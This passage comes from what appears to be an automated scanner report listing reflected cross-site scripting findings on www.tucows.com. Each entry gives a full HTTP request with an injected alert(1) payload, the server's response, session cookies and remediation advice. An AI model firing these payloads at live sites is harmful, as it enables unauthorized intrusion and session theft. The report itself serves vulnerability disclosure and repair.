HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 33135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Us</title> < ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d2e"-alert(1)-"560230630e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images39d2e"-alert(1)-"560230630e8/newassets/contact.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:41 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40764"-alert(1)-"3559dd93eff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets40764"-alert(1)-"3559dd93eff/contact.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:58 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffcf"-alert(1)-"e9260562356 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/contact.html3ffcf"-alert(1)-"e9260562356 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:12 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.16. http://www.tucows.com/images/newassets/contact.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c0c"-alert(1)-"83c957dbfec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/contact.html?28c0c"-alert(1)-"83c957dbfec=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:21 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe9d"-alert(1)-"8324c4abd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesafe9d"-alert(1)-"8324c4abd1e/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:15 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87e88"-alert(1)-"29fef7fc009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets87e88"-alert(1)-"29fef7fc009/includes/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff73f"-alert(1)-"c3006f1651f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesff73f"-alert(1)-"c3006f1651f/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e6b"-alert(1)-"3078349caa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbarb8e6b"-alert(1)-"3078349caa2/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14a3c"-alert(1)-"0443944911d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.014a3c"-alert(1)-"0443944911d/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 199e2"-alert(1)-"fac9720e4d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.0/css199e2"-alert(1)-"fac9720e4d9/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26131"-alert(1)-"79cf1522983 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.0/css/style.css26131"-alert(1)-"79cf1522983 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:19 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be67"-alert(1)-"26a6c055dc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.0/css/style.css?5be67"-alert(1)-"26a6c055dc5=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:00 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41642"-alert(1)-"3787a403d76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
